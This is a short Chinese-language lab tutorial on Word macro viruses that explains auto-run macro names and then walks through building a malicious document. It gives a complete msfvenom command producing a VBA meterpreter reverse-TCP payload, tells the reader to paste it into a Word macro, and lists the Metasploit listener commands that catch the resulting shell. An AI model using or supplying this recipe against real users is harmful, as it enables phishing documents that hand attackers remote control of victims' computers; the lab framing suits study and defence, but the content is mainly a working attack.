0x00 什么是宏病毒
宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。
AutoExec:启动 Word 或加载全局模板时AutoNew:每次新建文档时AutoOpen:每次打开已有文档时AutoClose:每次关闭文档时
0x01 简单实验环境搭建
本次实验的环境为:
win_10
word_
VM_kali_linux_(桥接模式)
首先在电脑中word信任中心设置中,打开启动所有宏选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。
宏设置
在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。
宏创建代码编辑界面
0x02实验开始
准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba
生成后门文件
将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址
ipconfig
在msf中设置本机监听:
use exploit/multi/handler #选泽监听模块set payload windows/meterpreter/reverse_tcp #选择生成木马相同的类型set LHOST 192.168.1.169 #设置本机ip监听set LPORT 6666 # 设置本机监听端口exploit #执行监听
当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。
获取shell
